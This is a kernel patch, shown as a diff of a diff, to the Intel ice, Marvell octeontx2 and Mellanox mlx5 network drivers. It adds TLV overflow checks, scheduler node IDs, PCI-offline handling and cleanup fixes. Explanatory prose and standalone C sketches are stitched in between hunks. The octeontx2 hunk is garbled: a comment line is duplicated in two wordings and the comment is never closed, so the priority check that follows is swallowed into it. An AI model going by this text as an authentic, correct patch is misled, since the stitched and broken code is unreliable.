+-	vsi->af_xdp_zc_qps = bitmap_zalloc(max_t(int, vsi->alloc_txq, vsi->alloc_rxq), GFP_KERNEL);
+-	if (!vsi->af_xdp_zc_qps)
+-		goto err_zc_qps;
+-
+ 	return 0;
+ 
+-err_zc_qps:
+-	devm_kfree(dev, vsi->q_vectors);
+ err_vectors:
+ 	devm_kfree(dev, vsi->rxq_map);
+ err_rxq_map:
+@@ -320,31 +314,17 @@ static void ice_vsi_free_arrays(struct ice_vsi *vsi)
+ 
+ 	dev = ice_pf_to_dev(pf);
+ 
+-	if (vsi->af_xdp_zc_qps) {
+-		bitmap_free(vsi->af_xdp_zc_qps);
+-		vsi->af_xdp_zc_qps = NULL;
+-	}
+ 	/* free the ring and vector containers */
+-	if (vsi->q_vectors) {
+-		devm_kfree(dev, vsi->q_vectors);
+-		vsi->q_vectors = NULL;
+-	}
+-	if (vsi->tx_rings) {
+-		devm_kfree(dev, vsi->tx_rings);
+-		vsi->tx_rings = NULL;
+-	}
+-	if (vsi->rx_rings) {
+-		devm_kfree(dev, vsi->rx_rings);
+-		vsi->rx_rings = NULL;
+-	}
+-	if (vsi->txq_map) {
+-		devm_kfree(dev, vsi->txq_map);
+-		vsi->txq_map = NULL;
+-	}
+-	if (vsi->rxq_map) {
+-		devm_kfree(dev, vsi->rxq_map);
+-		vsi->rxq_map = NULL;
+-	}
++	devm_kfree(dev, vsi->q_vectors);
++	vsi->q_vectors = NULL;
++	devm_kfree(dev, vsi->tx_rings);
++	vsi->tx_rings = NULL;
++	devm_kfree(dev, vsi->rx_rings);
++	vsi->rx_rings = NULL;
++	devm_kfree(dev, vsi->txq_map);
++	vsi->txq_map = NULL;
++	devm_kfree(dev, vsi->rxq_map);
++	vsi->rxq_map = NULL;
+ }
+ 
+ /**
+@@ -787,10 +767,8 @@ static void ice_rss_clean(struct ice_vsi *vsi)
+ 
+ 	dev = ice_pf_to_dev(pf);
+ 
+-	if (vsi->rss_hkey_user)
+-		devm_kfree(dev, vsi->rss_hkey_user);
+-	if (vsi->rss_lut_user)
+-		devm_kfree(dev, vsi->rss_lut_user);
++	devm_kfree(dev, vsi->rss_hkey_user);
++	devm_kfree(dev, vsi->rss_lut_user);
+ 
+ 	ice_vsi_clean_rss_flow_fld(vsi);
+ 	/* remove RSS replay list */
+diff --git a/drivers/net/ethernet/intel/ice/ice_nvm.c b/drivers/net/ethernet/intel/ice/ice_nvm.c
+index c262dc886e6a6..07ef6b1f00884 100644
+--- a/drivers/net/ethernet/intel/ice/ice_nvm.c
++++ b/drivers/net/ethernet/intel/ice/ice_nvm.c
+@@ -441,8 +441,7 @@ int
+ ice_get_pfa_module_tlv(struct ice_hw *hw, u16 *module_tlv, u16 *module_tlv_len,
+ 		       u16 module_type)
+ {
+-	u16 pfa_len, pfa_ptr;
+-	u16 next_tlv;
++	u16 pfa_len, pfa_ptr, next_tlv, max_tlv;
+ 	int status;
+ 
+ 	status = ice_read_sr_word(hw, ICE_SR_PFA_PTR, &pfa_ptr);
+@@ -455,11 +454,23 @@ ice_get_pfa_module_tlv(struct ice_hw *hw, u16 *module_tlv, u16 *module_tlv_len,
+ 		ice_debug(hw, ICE_DBG_INIT, "Failed to read PFA length.\n");
+ 		return status;
+ 	}
++
++	/* The Preserved Fields Area contains a sequence of Type-Length-Value
++	 * structures which define its contents. The PFA length includes all
++	 * of the TLVs, plus the initial length word itself, *and* one final
++	 * word at the end after all of the TLVs.
++	 */
++	if (check_add_overflow(pfa_ptr, pfa_len - 1, &max_tlv)) {
++		dev_warn(ice_hw_to_dev(hw), "PFA starts at offset %u. PFA length of %u caused 16-bit arithmetic overflow.\n",
++			 pfa_ptr, pfa_len);
++		return -EINVAL;
++	}
++
+ 	/* Starting with first TLV after PFA length, iterate through the list
+ 	 * of TLVs to find the requested one.
+ 	 */
+ 	next_tlv = pfa_ptr + 1;
+-	while (next_tlv < pfa_ptr + pfa_len) {
++	while (next_tlv < max_tlv) {
+ 		u16 tlv_sub_module_type;
+ 		u16 tlv_len;
+ 
+@@ -483,10 +494,13 @@ ice_get_pfa_module_tlv(struct ice_hw *hw, u16 *module_tlv, u16 *module_tlv_len,
+ 			}
+ 			return -EINVAL;
+ 		}
+-		/* Check next TLV, i.e. current TLV pointer + length + 2 words
+-		 * (for current TLV's type and length)
+-		 */
+-		next_tlv = next_tlv + tlv_len + 2;
++
++		if (check_add_overflow(next_tlv, 2, &next_tlv) ||
++		    check_add_overflow(next_tlv, tlv_len, &next_tlv)) {
++			dev_warn(ice_hw_to_dev(hw), "TLV of type %u and length 0x%04x caused 16-bit arithmetic overflow. The PFA starts at 0x%04x and has length of 0x%04x\n",
++				 tlv_sub_module_type, tlv_len, pfa_ptr, pfa_len);
++			return -EINVAL;
++		}
+ 	}
+ 	/* Module does not exist */
+ 	return -ENOENT;
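
The reworked TLV walk guards both 16-bit additions with check_add_overflow(), which wraps the compiler's __builtin_add_overflow(). A standalone sketch of the first check, using a deliberately oversized hypothetical PFA:

    #include <stdio.h>
    #include <stdint.h>

    int main(void)
    {
            uint16_t pfa_ptr = 0xff00, pfa_len = 0x0200, max_tlv;

            /* 0xff00 + 0x01ff does not fit in 16 bits, so the walk bails
             * out instead of wrapping and scanning from a bogus offset. */
            if (__builtin_add_overflow(pfa_ptr, pfa_len - 1, &max_tlv)) {
                    printf("16-bit overflow: 0x%04x + 0x%04x\n",
                           pfa_ptr, pfa_len - 1);
                    return 1;
            }
            printf("max_tlv = 0x%04x\n", max_tlv);
            return 0;
    }
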
+diff --git a/drivers/net/ethernet/intel/ice/ice_sched.c b/drivers/net/ethernet/intel/ice/ice_sched.c
+index 2c62c1763ee0d..849b6c7f0506b 100644
+--- a/drivers/net/ethernet/intel/ice/ice_sched.c
++++ b/drivers/net/ethernet/intel/ice/ice_sched.c
+@@ -1,6 +1,7 @@
+ // SPDX-License-Identifier: GPL-2.0
+ /* Copyright (c) 2018, Intel Corporation. */
+ 
++#include <net/devlink.h>
+ #include "ice_sched.h"
+ 
+ /**
+@@ -352,9 +353,9 @@ void ice_free_sched_node(struct ice_port_info *pi, struct ice_sched_node *node)
+ 				node->sibling;
+ 	}
+ 
+-	/* leaf nodes have no children */
+-	if (node->children)
+-		devm_kfree(ice_hw_to_dev(hw), node->children);
++	devm_kfree(ice_hw_to_dev(hw), node->children);
++	kfree(node->name);
++	xa_erase(&pi->sched_node_ids, node->id);
+ 	devm_kfree(ice_hw_to_dev(hw), node);
+ }
+ 
+@@ -850,10 +851,8 @@ void ice_sched_cleanup_all(struct ice_hw *hw)
+ 	if (!hw)
+ 		return;
+ 
+-	if (hw->layer_info) {
+-		devm_kfree(ice_hw_to_dev(hw), hw->layer_info);
+-		hw->layer_info = NULL;
+-	}
++	devm_kfree(ice_hw_to_dev(hw), hw->layer_info);
++	hw->layer_info = NULL;
+ 
+ 	ice_sched_clear_port(hw->port_info);
+ 
+@@ -875,7 +874,7 @@ void ice_sched_cleanup_all(struct ice_hw *hw)
+  *
+  * This function add nodes to HW as well as to SW DB for a given layer
+  */
+-static int
++int
+ ice_sched_add_elems(struct ice_port_info *pi, struct ice_sched_node *tc_node,
+ 		    struct ice_sched_node *parent, u8 layer, u16 num_nodes,
+ 		    u16 *num_nodes_added, u32 *first_node_teid)
+@@ -940,6 +939,22 @@ ice_sched_add_elems(struct ice_port_info *pi, struct ice_sched_node *tc_node,
+ 
+ 		new_node->sibling = NULL;
+ 		new_node->tc_num = tc_node->tc_num;
++		new_node->tx_weight = ICE_SCHED_DFLT_BW_WT;
++		new_node->tx_share = ICE_SCHED_DFLT_BW;
++		new_node->tx_max = ICE_SCHED_DFLT_BW;
++		new_node->name = kzalloc(SCHED_NODE_NAME_MAX_LEN, GFP_KERNEL);
++		if (!new_node->name)
++			return -ENOMEM;
++
++		status = xa_alloc(&pi->sched_node_ids, &new_node->id, NULL, XA_LIMIT(0, UINT_MAX),
++				  GFP_KERNEL);
++		if (status) {
++			ice_debug(hw, ICE_DBG_SCHED, "xa_alloc failed for sched node status =%d\n",
++				  status);
++			break;
++		}
++
++		snprintf(new_node->name, SCHED_NODE_NAME_MAX_LEN, "node_%u", new_node->id);
+ 
+ 		/* add it to previous node sibling pointer */
+ 		/* Note: siblings are not linked across branches */
+@@ -2154,7 +2169,7 @@ ice_sched_get_free_vsi_parent(struct ice_hw *hw, struct ice_sched_node *node,
+  * This function removes the child from the old parent and adds it to a new
+  * parent
+  */
+-static void
++void
+ ice_sched_update_parent(struct ice_sched_node *new_parent,
+ 			struct ice_sched_node *node)
+ {
+@@ -2188,7 +2203,7 @@ ice_sched_update_parent(struct ice_sched_node *new_parent,
+  *
+  * This function move the child nodes to a given parent.
+  */
+-static int
++int
+ ice_sched_move_nodes(struct ice_port_info *pi, struct ice_sched_node *parent,
+ 		     u16 num_items, u32 *list)
+ {
+@@ -3562,7 +3577,7 @@ ice_sched_set_eir_srl_excl(struct ice_port_info *pi,
+  * node's RL profile ID of type CIR, EIR, or SRL, and removes old profile
+  * ID from local database. The caller needs to hold scheduler lock.
+  */
+-static int
++int
+ ice_sched_set_node_bw(struct ice_port_info *pi, struct ice_sched_node *node,
+ 		      enum ice_rl_type rl_type, u32 bw, u8 layer_num)
+ {
+@@ -3598,6 +3613,57 @@ ice_sched_set_node_bw(struct ice_port_info *pi, struct ice_sched_node *node,
+ 				       ICE_AQC_RL_PROFILE_TYPE_M, old_id);
+ }
+ 
++/**
++ * ice_sched_set_node_priority - set node's priority
++ * @pi: port information structure
++ * @node: tree node
++ * @priority: number 0-7 representing priority among siblings
++ *
++ * This function sets the priority of a node among its siblings.
++ */
++int
++ice_sched_set_node_priority(struct ice_port_info *pi, struct ice_sched_node *node,
++			    u16 priority)
++{
++	struct ice_aqc_txsched_elem_data buf;
++	struct ice_aqc_txsched_elem *data;
++
++	buf = node->info;
++	data = &buf.data;
++
++	data->valid_sections |= ICE_AQC_ELEM_VALID_GENERIC;
++	data->generic |= FIELD_PREP(ICE_AQC_ELEM_GENERIC_PRIO_M, priority);
++
++	return ice_sched_update_elem(pi->hw, node, &buf);
++}
++
++/**
++ * ice_sched_set_node_weight - set node's weight
++ * @pi: port information structure
++ * @node: tree node
++ * @weight: number 1-200 representing weight for WFQ
++ *
++ * This function sets weight of the node for WFQ algorithm.
++ */
++int
++ice_sched_set_node_weight(struct ice_port_info *pi, struct ice_sched_node *node, u16 weight)
++{
++	struct ice_aqc_txsched_elem_data buf;
++	struct ice_aqc_txsched_elem *data;
++
++	buf = node->info;
++	data = &buf.data;
++
++	data->valid_sections = ICE_AQC_ELEM_VALID_CIR | ICE_AQC_ELEM_VALID_EIR |
++			       ICE_AQC_ELEM_VALID_GENERIC;
++	data->cir_bw.bw_alloc = cpu_to_le16(weight);
++	data->eir_bw.bw_alloc = cpu_to_le16(weight);
++
++	data->generic |= FIELD_PREP(ICE_AQC_ELEM_GENERIC_SP_M, 0x0);
++
++	return ice_sched_update_elem(pi->hw, node, &buf);
++}
++
+ /**
+  * ice_sched_set_node_bw_lmt - set node's BW limit
+  * @pi: port information structure
+@@ -3608,7 +3674,7 @@ ice_sched_set_node_bw(struct ice_port_info *pi, struct ice_sched_node *node,
+  * It updates node's BW limit parameters like BW RL profile ID of type CIR,
+  * EIR, or SRL. The caller needs to hold scheduler lock.
+  */
+-static int
++int
+ ice_sched_set_node_bw_lmt(struct ice_port_info *pi, struct ice_sched_node *node,
+ 			  enum ice_rl_type rl_type, u32 bw)
+ {
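
The scheduler hunks give every node a unique numeric id from an xarray allocator plus a "node_%u" name, and release both in ice_free_sched_node(). The xarray API is kernel-only; the sketch below is a hypothetical userspace stand-in using a free-slot array, only to show the allocate-on-create / erase-on-free pairing:

    #include <stdio.h>

    #define MAX_IDS 64
    static unsigned char used[MAX_IDS];        /* stand-in for the xarray */

    static int id_alloc(unsigned int *id)      /* like xa_alloc() */
    {
            for (unsigned int i = 0; i < MAX_IDS; i++)
                    if (!used[i]) {
                            used[i] = 1;
                            *id = i;
                            return 0;
                    }
            return -1;
    }

    static void id_erase(unsigned int id)      /* like xa_erase() */
    {
            used[id] = 0;
    }

    int main(void)
    {
            unsigned int id;
            char name[32];

            if (id_alloc(&id))
                    return 1;
            snprintf(name, sizeof(name), "node_%u", id);
            printf("%s\n", name);
            id_erase(id);   /* paired in the node-free path */
            return 0;
    }
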
+diff --git a/drivers/net/ethernet/intel/ice/ice_sched.h b/drivers/net/ethernet/intel/ice/ice_sched.h
+index 4f91577fed56b..920db43ed4fa6 100644
+--- a/drivers/net/ethernet/intel/ice/ice_sched.h
++++ b/drivers/net/ethernet/intel/ice/ice_sched.h
+@@ -6,6 +6,8 @@
+ 
+ #include "ice_common.h"
+ 
++#define SCHED_NODE_NAME_MAX_LEN 32
++
+ #define ICE_QGRP_LAYER_OFFSET	2
+ #define ICE_VSI_LAYER_OFFSET	4
+ #define ICE_AGG_LAYER_OFFSET	6
+@@ -69,6 +71,28 @@ int
+ ice_aq_query_sched_elems(struct ice_hw *hw, u16 elems_req,
+ 			 struct ice_aqc_txsched_elem_data *buf, u16 buf_size,
+ 			 u16 *elems_ret, struct ice_sq_cd *cd);
++
++int
++ice_sched_set_node_bw_lmt(struct ice_port_info *pi, struct ice_sched_node *node,
++			  enum ice_rl_type rl_type, u32 bw);
++
++int
++ice_sched_set_node_bw(struct ice_port_info *pi, struct ice_sched_node *node,
++		      enum ice_rl_type rl_type, u32 bw, u8 layer_num);
++
++int
++ice_sched_add_elems(struct ice_port_info *pi, struct ice_sched_node *tc_node,
++		    struct ice_sched_node *parent, u8 layer, u16 num_nodes,
++		    u16 *num_nodes_added, u32 *first_node_teid);
++
++int
++ice_sched_move_nodes(struct ice_port_info *pi, struct ice_sched_node *parent,
++		     u16 num_items, u32 *list);
++
++int ice_sched_set_node_priority(struct ice_port_info *pi, struct ice_sched_node *node,
++				u16 priority);
++int ice_sched_set_node_weight(struct ice_port_info *pi, struct ice_sched_node *node, u16 weight);
++
+ int ice_sched_init_port(struct ice_port_info *pi);
+ int ice_sched_query_res_alloc(struct ice_hw *hw);
+ void ice_sched_get_psm_clk_freq(struct ice_hw *hw);
+@@ -82,6 +106,9 @@ ice_sched_find_node_by_teid(struct ice_sched_node *start_node, u32 teid);
+ int
+ ice_sched_add_node(struct ice_port_info *pi, u8 layer,
+ 		   struct ice_aqc_txsched_elem_data *info);
++void
++ice_sched_update_parent(struct ice_sched_node *new_parent,
++			struct ice_sched_node *node);
+ void ice_free_sched_node(struct ice_port_info *pi, struct ice_sched_node *node);
+ struct ice_sched_node *ice_sched_get_tc_node(struct ice_port_info *pi, u8 tc);
+ struct ice_sched_node *
+diff --git a/drivers/net/ethernet/intel/ice/ice_switch.c b/drivers/net/ethernet/intel/ice/ice_switch.c
+index 46b36851af460..5ea6365872571 100644
+--- a/drivers/net/ethernet/intel/ice/ice_switch.c
++++ b/drivers/net/ethernet/intel/ice/ice_switch.c
+@@ -1636,21 +1636,16 @@ ice_save_vsi_ctx(struct ice_hw *hw, u16 vsi_handle, struct ice_vsi_ctx *vsi)
+  */
+ static void ice_clear_vsi_q_ctx(struct ice_hw *hw, u16 vsi_handle)
+ {
+-	struct ice_vsi_ctx *vsi;
++	struct ice_vsi_ctx *vsi = ice_get_vsi_ctx(hw, vsi_handle);
+ 	u8 i;
+ 
+-	vsi = ice_get_vsi_ctx(hw, vsi_handle);
+ 	if (!vsi)
+ 		return;
+ 	ice_for_each_traffic_class(i) {
+-		if (vsi->lan_q_ctx[i]) {
+-			devm_kfree(ice_hw_to_dev(hw), vsi->lan_q_ctx[i]);
+-			vsi->lan_q_ctx[i] = NULL;
+-		}
+-		if (vsi->rdma_q_ctx[i]) {
+-			devm_kfree(ice_hw_to_dev(hw), vsi->rdma_q_ctx[i]);
+-			vsi->rdma_q_ctx[i] = NULL;
+-		}
++		devm_kfree(ice_hw_to_dev(hw), vsi->lan_q_ctx[i]);
++		vsi->lan_q_ctx[i] = NULL;
++		devm_kfree(ice_hw_to_dev(hw), vsi->rdma_q_ctx[i]);
++		vsi->rdma_q_ctx[i] = NULL;
+ 	}
+ }
+ 
+@@ -5525,9 +5520,7 @@ ice_add_adv_recipe(struct ice_hw *hw, struct ice_adv_lkup_elem *lkups,
+ 		devm_kfree(ice_hw_to_dev(hw), fvit);
+ 	}
+ 
+-	if (rm->root_buf)
+-		devm_kfree(ice_hw_to_dev(hw), rm->root_buf);
+-
++	devm_kfree(ice_hw_to_dev(hw), rm->root_buf);
+ 	kfree(rm);
+ 
+ err_free_lkup_exts:
+diff --git a/drivers/net/ethernet/intel/ice/ice_type.h b/drivers/net/ethernet/intel/ice/ice_type.h
+index e1abfcee96dcd..daf86cf561bc7 100644
+--- a/drivers/net/ethernet/intel/ice/ice_type.h
++++ b/drivers/net/ethernet/intel/ice/ice_type.h
+@@ -524,7 +524,14 @@ struct ice_sched_node {
+ 	struct ice_sched_node *sibling; /* next sibling in the same layer */
+ 	struct ice_sched_node **children;
+ 	struct ice_aqc_txsched_elem_data info;
++	char *name;
++	struct devlink_rate *rate_node;
++	u64 tx_max;
++	u64 tx_share;
+ 	u32 agg_id;			/* aggregator group ID */
++	u32 id;
++	u32 tx_priority;
++	u32 tx_weight;
+ 	u16 vsi_handle;
+ 	u8 in_use;			/* suspended or in use */
+ 	u8 tx_sched_layer;		/* Logical Layer (1-9) */
+@@ -706,6 +713,7 @@ struct ice_port_info {
+ 	/* List contain profile ID(s) and other params per layer */
+ 	struct list_head rl_prof_list[ICE_AQC_TOPO_MAX_LEVEL_NUM];
+ 	struct ice_qos_cfg qos_cfg;
++	struct xarray sched_node_ids;
+ 	u8 is_vf:1;
+ };
+ 
+diff --git a/drivers/net/ethernet/intel/ice/ice_xsk.c b/drivers/net/ethernet/intel/ice/ice_xsk.c
+index 48cf24709fe32..b917f271cdac1 100644
+--- a/drivers/net/ethernet/intel/ice/ice_xsk.c
++++ b/drivers/net/ethernet/intel/ice/ice_xsk.c
+@@ -281,7 +281,6 @@ static int ice_xsk_pool_disable(struct ice_vsi *vsi, u16 qid)
+ 	if (!pool)
+ 		return -EINVAL;
+ 
+-	clear_bit(qid, vsi->af_xdp_zc_qps);
+ 	xsk_pool_dma_unmap(pool, ICE_RX_DMA_ATTR);
+ 
+ 	return 0;
+@@ -312,8 +311,6 @@ ice_xsk_pool_enable(struct ice_vsi *vsi, struct xsk_buff_pool *pool, u16 qid)
+ 	if (err)
+ 		return err;
+ 
+-	set_bit(qid, vsi->af_xdp_zc_qps);
+-
+ 	return 0;
+ }
+ 
+@@ -361,11 +358,13 @@ ice_realloc_rx_xdp_bufs(struct ice_rx_ring *rx_ring, bool pool_present)
+ int ice_realloc_zc_buf(struct ice_vsi *vsi, bool zc)
+ {
+ 	struct ice_rx_ring *rx_ring;
+-	unsigned long q;
++	uint i;
++
++	ice_for_each_rxq(vsi, i) {
++		rx_ring = vsi->rx_rings[i];
++		if (!rx_ring->xsk_pool)
++			continue;
+ 
+-	for_each_set_bit(q, vsi->af_xdp_zc_qps,
+-			 max_t(int, vsi->alloc_txq, vsi->alloc_rxq)) {
+-		rx_ring = vsi->rx_rings[q];
+ 		if (ice_realloc_rx_xdp_bufs(rx_ring, zc))
+ 			return -ENOMEM;
+ 	}
+diff --git a/drivers/net/ethernet/marvell/octeontx2/af/rvu_npc.c b/drivers/net/ethernet/marvell/octeontx2/af/rvu_npc.c
+index 91a4ea529d077..00ef6d201b973 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/af/rvu_npc.c
++++ b/drivers/net/ethernet/marvell/octeontx2/af/rvu_npc.c
+@@ -2506,7 +2506,17 @@ static int npc_mcam_alloc_entries(struct npc_mcam *mcam, u16 pcifunc,
+ 	 * - when available free entries are less.
+ 	 * Lower priority ones out of available free entries are always
+ 	 * chosen when 'high vs low' question arises.
++	 *
++	 * For a VF base MCAM match rule is set by its PF. And all the
++	 * For a VF, the base MCAM match rule is set by its PF, and all
++	 * further MCAM rules the VF installs on its own are concatenated
++	 * with that base rule. Hence PF entries should be at lower
++	 * priority than VF entries; otherwise the base rule is always
++	 * hit and the rules installed by the VF are of no use. So if
++	 * the request is from a PF, allocate low priority entries.
++	if (!(pcifunc & RVU_PFVF_FUNC_MASK))
++		goto lprio_alloc;
+ 
+ 	/* Get the search range for priority allocation request */
+ 	if (req->priority) {
+@@ -2515,17 +2525,6 @@ static int npc_mcam_alloc_entries(struct npc_mcam *mcam, u16 pcifunc,
+ 		goto alloc;
+ 	}
+ 
+-	/* For a VF base MCAM match rule is set by its PF. And all the
+-	 * further MCAM rules installed by VF on its own are
+-	 * concatenated with the base rule set by its PF. Hence PF entries
+-	 * should be at lower priority compared to VF entries. Otherwise
+-	 * base rule is hit always and rules installed by VF will be of
+-	 * no use. Hence if the request is from PF and NOT a priority
+-	 * allocation request then allocate low priority entries.
+-	 */
+-	if (!(pcifunc & RVU_PFVF_FUNC_MASK))
+-		goto lprio_alloc;
+-
+ 	/* Find out the search range for non-priority allocation request
+ 	 *
+ 	 * Get MCAM free entry count in middle zone.
+@@ -2555,6 +2554,18 @@ static int npc_mcam_alloc_entries(struct npc_mcam *mcam, u16 pcifunc,
+ 		reverse = true;
+ 		start = 0;
+ 		end = mcam->bmap_entries;
++		/* Ensure PF requests always land at the bottom. If a PF
++		 * asks for a higher/lower priority entry w.r.t. the
++		 * reference entry, honour that and search from the bottom
++		 * rather than the mid zone.
++		 */
++		if (!(pcifunc & RVU_PFVF_FUNC_MASK) &&
++		    req->priority == NPC_MCAM_HIGHER_PRIO)
++			end = req->ref_entry;
++
++		if (!(pcifunc & RVU_PFVF_FUNC_MASK) &&
++		    req->priority == NPC_MCAM_LOWER_PRIO)
++			start = req->ref_entry;
+ 	}
+ 
+ alloc:
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/en_main.c b/drivers/net/ethernet/mellanox/mlx5/core/en_main.c
+index e2f134e1d9fcf..4c0eac83546de 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/en_main.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/en_main.c
+@@ -4587,7 +4587,7 @@ static netdev_features_t mlx5e_tunnel_features_check(struct mlx5e_priv *priv,
+ 
+ 		/* Verify if UDP port is being offloaded by HW */
+ 		if (mlx5_vxlan_lookup_port(priv->mdev->vxlan, port))
+-			return features;
++			return vxlan_features_check(skb, features);
+ 
+ #if IS_ENABLED(CONFIG_GENEVE)
+ 		/* Support Geneve offload for default UDP port */
+@@ -4613,7 +4613,6 @@ netdev_features_t mlx5e_features_check(struct sk_buff *skb,
+ 	struct mlx5e_priv *priv = netdev_priv(netdev);
+ 
+ 	features = vlan_features_check(skb, features);
+-	features = vxlan_features_check(skb, features);
+ 
+ 	/* Validate if the tunneled packet is being offloaded by HW */
+ 	if (skb->encapsulation &&
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/fw.c b/drivers/net/ethernet/mellanox/mlx5/core/fw.c
+index f34e758a2f1f6..9e26dda93f8ee 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/fw.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/fw.c
+@@ -379,6 +379,10 @@ int mlx5_cmd_fast_teardown_hca(struct mlx5_core_dev *dev)
+ 	do {
+ 		if (mlx5_get_nic_state(dev) == MLX5_NIC_IFC_DISABLED)
+ 			break;
++		if (pci_channel_offline(dev->pdev)) {
++			mlx5_core_err(dev, "PCI channel offline, stop waiting for NIC IFC\n");
++			return -EACCES;
++		}
+ 
+ 		cond_resched();
+ 	} while (!time_after(jiffies, end));
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/health.c b/drivers/net/ethernet/mellanox/mlx5/core/health.c
+index e42e4ac231c64..65483dab90573 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/health.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/health.c
+@@ -260,6 +260,10 @@ void mlx5_error_sw_reset(struct mlx5_core_dev *dev)
+ 	do {
+ 		if (mlx5_get_nic_state(dev) == MLX5_NIC_IFC_DISABLED)
+ 			break;
++		if (pci_channel_offline(dev->pdev)) {
++			mlx5_core_err(dev, "PCI channel offline, stop waiting for NIC IFC\n");
++			goto unlock;
++		}
+ 
+ 		msleep(20);
+ 	} while (!time_after(jiffies, end));
+@@ -325,6 +329,14 @@ int mlx5_health_wait_pci_up(struct mlx5_core_dev *dev)
+ 	while (sensor_pci_not_working(dev)) {
+ 		if (time_after(jiffies, end))
+ 			return -ETIMEDOUT;
++		if (test_bit(MLX5_BREAK_FW_WAIT, &dev->intf_state)) {
++			mlx5_core_warn(dev, "device is being removed, stop waiting for PCI\n");
++			return -ENODEV;
++		}
++		if (pci_channel_offline(dev->pdev)) {
++			mlx5_core_err(dev, "PCI channel offline, stop waiting for PCI\n");
++			return -EACCES;
++		}
+ 		msleep(100);
+ 	}
+ 	return 0;
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/lag/port_sel.c b/drivers/net/ethernet/mellanox/mlx5/core/lag/port_sel.c
+index 7d9bbb494d95b..005661248c7e9 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/lag/port_sel.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/lag/port_sel.c
+@@ -88,9 +88,13 @@ static int mlx5_lag_create_port_sel_table(struct mlx5_lag *ldev,
+ 								      &dest, 1);
+ 			if (IS_ERR(lag_definer->rules[idx])) {
+ 				err = PTR_ERR(lag_definer->rules[idx]);
+-				while (i--)
+-					while (j--)
++				do {
++					while (j--) {
++						idx = i * ldev->buckets + j;
+ 						mlx5_del_flow_rules(lag_definer->rules[idx]);
++					}
++					j = ldev->buckets;
++				} while (i--);
+ 				goto destroy_fg;
+ 			}
+ 		}
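
The port_sel.c change fixes a classic nested-cleanup bug: the old `while (i--) while (j--)` unwind neither reset j between outer iterations nor recomputed idx, so most already-created rules leaked. A standalone model of the corrected unwind, assuming creation failed at i=1, j=1 with 3 buckets per port:

    #include <stdio.h>

    #define BUCKETS 3

    int main(void)
    {
            int i = 1, j = 1;   /* indices at the point of failure */

            /* Finish the partially built row first (j still holds the
             * failing bucket), then walk every earlier row with j reset
             * to BUCKETS, recomputing idx each time. */
            do {
                    while (j--) {
                            int idx = i * BUCKETS + j;
                            printf("deleting rule %d\n", idx);
                    }
                    j = BUCKETS;
            } while (i--);
            return 0;   /* deletes rules 3, 2, 1, 0 -- all that existed */
    }
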
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/lib/pci_vsc.c b/drivers/net/ethernet/mellanox/mlx5/core/lib/pci_vsc.c
+index 6b774e0c27665..d0b595ba61101 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/lib/pci_vsc.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/lib/pci_vsc.c
+@@ -74,6 +74,10 @@ int mlx5_vsc_gw_lock(struct mlx5_core_dev *dev)
+ 			ret = -EBUSY;
+ 			goto pci_unlock;
+ 		}
++		if (pci_channel_offline(dev->pdev)) {
++			ret = -EACCES;
++			goto pci_unlock;
++		}
+ 
+ 		/* Check if semaphore is already locked */
+ 		ret = vsc_read(dev, VSC_SEMAPHORE_OFFSET, &lock_val);
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/main.c b/drivers/net/ethernet/mellanox/mlx5/core/main.c
+index 6ab0642e9de78..67849b1c0bb71 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/main.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/main.c
+@@ -1093,7 +1093,7 @@ static void mlx5_cleanup_once(struct mlx5_core_dev *dev)
+ 	mlx5_devcom_unregister_device(dev->priv.devcom);
+ }
+ 
+-static int mlx5_function_setup(struct mlx5_core_dev *dev, bool boot, u64 timeout)
++static int mlx5_function_enable(struct mlx5_core_dev *dev, bool boot, u64 timeout)
+ {
+ 	int err;
+ 
+@@ -1158,28 +1158,56 @@ static int mlx5_function_setup(struct mlx5_core_dev *dev, bool boot, u64 timeout
+ 		goto reclaim_boot_pages;
+ 	}
+ 
++	return 0;
++
++reclaim_boot_pages:
++	mlx5_reclaim_startup_pages(dev);
++err_disable_hca:
++	mlx5_core_disable_hca(dev, 0);
++stop_health_poll:
++	mlx5_stop_health_poll(dev, boot);
++err_cmd_cleanup:
++	mlx5_cmd_set_state(dev, MLX5_CMDIF_STATE_DOWN);
++	mlx5_cmd_cleanup(dev);
++
++	return err;
++}
++
++static void mlx5_function_disable(struct mlx5_core_dev *dev, bool boot)
++{
++	mlx5_reclaim_startup_pages(dev);
++	mlx5_core_disable_hca(dev, 0);
++	mlx5_stop_health_poll(dev, boot);
++	mlx5_cmd_set_state(dev, MLX5_CMDIF_STATE_DOWN);
++	mlx5_cmd_cleanup(dev);
++}
++
++static int mlx5_function_open(struct mlx5_core_dev *dev)
++{
++	int err;
++
+ 	err = set_hca_ctrl(dev);
+ 	if (err) {
+ 		mlx5_core_err(dev, "set_hca_ctrl failed\n");
+-		goto reclaim_boot_pages;
++		return err;
+ 	}
+ 
+ 	err = set_hca_cap(dev);
+ 	if (err) {
+ 		mlx5_core_err(dev, "set_hca_cap failed\n");
+-		goto reclaim_boot_pages;
++		return err;
+ 	}
+ 
+ 	err = mlx5_satisfy_startup_pages(dev, 0);
+ 	if (err) {
+ 		mlx5_core_err(dev, "failed to allocate init pages\n");
+-		goto reclaim_boot_pages;
++		return err;
+ 	}
+ 
+ 	err = mlx5_cmd_init_hca(dev, sw_owner_id);
+ 	if (err) {
+ 		mlx5_core_err(dev, "init hca failed\n");
+-		goto reclaim_boot_pages;
++		return err;
+ 	}
+ 
+ 	mlx5_set_driver_version(dev);
+@@ -1187,26 +1215,13 @@ static int mlx5_function_setup(struct mlx5_core_dev *dev, bool boot, u64 timeout
+ 	err = mlx5_query_hca_caps(dev);
+ 	if (err) {
